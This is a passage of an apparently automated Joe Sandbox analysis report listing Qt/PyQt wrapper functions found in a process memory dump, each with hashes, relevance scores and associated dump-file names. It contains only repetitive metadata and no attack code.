                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setLimit@MiterPen@@
                                                                                                                                                                                                                                          • String ID: QPen$setMiterLimit$setMiterLimit(self, limit: float)
                                                                                                                                                                                                                                          • API String ID: 1691174720-3064348093
                                                                                                                                                                                                                                          • Opcode ID: c05fca766996a1100785e0fcb63486ee3d140d717b4f404b4a3f757f6e06317c
                                                                                                                                                                                                                                          • Instruction ID: 8615bdb7a57a05268b9ba5969d0cdb5760b2f7da8c90b15c037ba35a4833d44d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c05fca766996a1100785e0fcb63486ee3d140d717b4f404b4a3f757f6e06317c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91112A36A08F46D1EB10DF21E8896A933A4FB44F94F914132DA9E03320EF3DE55AC704
                                                                                                                                                                                                                                          Function 00007FF89D9B3AD0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?removeColumn@Item@@Standard
                                                                                                                                                                                                                                          • String ID: QStandardItem$removeColumn$removeColumn(self, column: int)
                                                                                                                                                                                                                                          • API String ID: 2771442086-3921793217
                                                                                                                                                                                                                                          • Opcode ID: adcc2b2aeecedbd0562ea63310394f5fce69d6fffcbfbe064dbb5b35cf5d1cd9
                                                                                                                                                                                                                                          • Instruction ID: fb5db56556399bc4177e137da993cb2ccedd0ef3e317313c3e304942c0836cf1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: adcc2b2aeecedbd0562ea63310394f5fce69d6fffcbfbe064dbb5b35cf5d1cd9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C711E876A18E46D2EB10DF11E8896A933A5FB44FC4F914132DA9E03320EF3DE55AC744
                                                                                                                                                                                                                                          Function 00007FF89D96FE50 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setHeight@Window@@
                                                                                                                                                                                                                                          • String ID: QWindow$setHeight$setHeight(self, arg: int)
                                                                                                                                                                                                                                          • API String ID: 3153827525-3907896206
                                                                                                                                                                                                                                          • Opcode ID: a3770f6fcbe74cdc623f9bdc490b62619909e5557bc26d8e7837d9ef482d14de
                                                                                                                                                                                                                                          • Instruction ID: bdf59be6430e3053eef9503b5533ca6541b8f313806525f2379934934cfb340e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3770f6fcbe74cdc623f9bdc490b62619909e5557bc26d8e7837d9ef482d14de
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97112A36A08F46D1EB10CF10E8896A933A4FB44F84F914132DA9E03320EF7DE55AC708
                                                                                                                                                                                                                                          Function 00007FF89D931DB0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setDoubleTop@Validator@@
                                                                                                                                                                                                                                          • String ID: QDoubleValidator$setTop$setTop(self, a0: float)
                                                                                                                                                                                                                                          • API String ID: 236495550-2298479482
                                                                                                                                                                                                                                          • Opcode ID: 39433fc4f0b28a58bfdb8d75a05f331745c07c2b40848e53f705764f3f56c8ef
                                                                                                                                                                                                                                          • Instruction ID: 8a2d9ec93f449d8c9aa54c759b08fd55657387d32b44fbca63a076fa095879f8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39433fc4f0b28a58bfdb8d75a05f331745c07c2b40848e53f705764f3f56c8ef
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5111836A08E46D1EB10DF25E8896A933A4FB54F94F914032DA9E03320EF3DE55AC704
                                                                                                                                                                                                                                          Function 00007FF89D983D90 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setBufferFormat@@Size@StencilSurface
                                                                                                                                                                                                                                          • String ID: QSurfaceFormat$setStencilBufferSize$setStencilBufferSize(self, size: int)
                                                                                                                                                                                                                                          • API String ID: 1793431822-2721710501
                                                                                                                                                                                                                                          • Opcode ID: 08f3612216dfc66986bca9366b597da75ac3b44f25a1ce1d0f8f345a2d119e79
                                                                                                                                                                                                                                          • Instruction ID: 30f7ce822e9488aa9166648e34cca2b07696098ac3b0cb2ce8b359c165d69253
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08f3612216dfc66986bca9366b597da75ac3b44f25a1ce1d0f8f345a2d119e79
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7211E876A18E46D1EB10DF11E8896A933A4FB44F84F914132DA8E43320EF3DE96AC744
                                                                                                                                                                                                                                          Function 00007FF89D98BD20 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setFormat@@Interval@SurfaceSwap
                                                                                                                                                                                                                                          • String ID: QSurfaceFormat$setSwapInterval$setSwapInterval(self, interval: int)
                                                                                                                                                                                                                                          • API String ID: 2382669227-2638137130
                                                                                                                                                                                                                                          • Opcode ID: 1f44c9c4ddae35bf89eec5e21602831fe8cd72cef12eaf7696e41fde9bf4a86c
                                                                                                                                                                                                                                          • Instruction ID: 09817939da1924fe13bf41c0a8a117010565eb2072dd7da9a666ce39642a92f4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f44c9c4ddae35bf89eec5e21602831fe8cd72cef12eaf7696e41fde9bf4a86c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7111876A08E46D1EB10DF10E8896A933A4FB44F84F914132DA8E03320EF3DE55AC704
                                                                                                                                                                                                                                          Function 00007FF89D951D30 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setCacheEnabled@Layout@@Text
                                                                                                                                                                                                                                          • String ID: QTextLayout$setCacheEnabled$setCacheEnabled(self, enable: bool)
                                                                                                                                                                                                                                          • API String ID: 2581981687-4022325882
                                                                                                                                                                                                                                          • Opcode ID: 320a5e41164041cd9cd13240c74d6f9e69abe62decff541baad352d4a6404729
                                                                                                                                                                                                                                          • Instruction ID: 5bcb648e667f323188ab0d3d86ce7d638c8d3e82c8ae8f2b8d54d7f6500a344d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 320a5e41164041cd9cd13240c74d6f9e69abe62decff541baad352d4a6404729
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04111876A18E46D1EB10CB20E8896A933A5FB44F84F914132DA9E03320EF3DE559C704
                                                                                                                                                                                                                                          Function 00007FF89D986090 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setResolution@Writer@@
                                                                                                                                                                                                                                          • String ID: QPdfWriter$setResolution$setResolution(self, resolution: int)
                                                                                                                                                                                                                                          • API String ID: 3182610714-59700000
                                                                                                                                                                                                                                          • Opcode ID: be405ba56195a025867bd3f41f99ed977da8e98cea7899a76c0716fc032902e3
                                                                                                                                                                                                                                          • Instruction ID: 2aa447831ad6a1788cf1a57c5f1f256796f92dc92c51602c515038a3e44cc277
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be405ba56195a025867bd3f41f99ed977da8e98cea7899a76c0716fc032902e3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1811E876A18E46D2EB10DF11E8896A933A5FB44F84F914132DA8E47320EF3DE55AC744
                                                                                                                                                                                                                                          Function 00007FF89D94E020 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
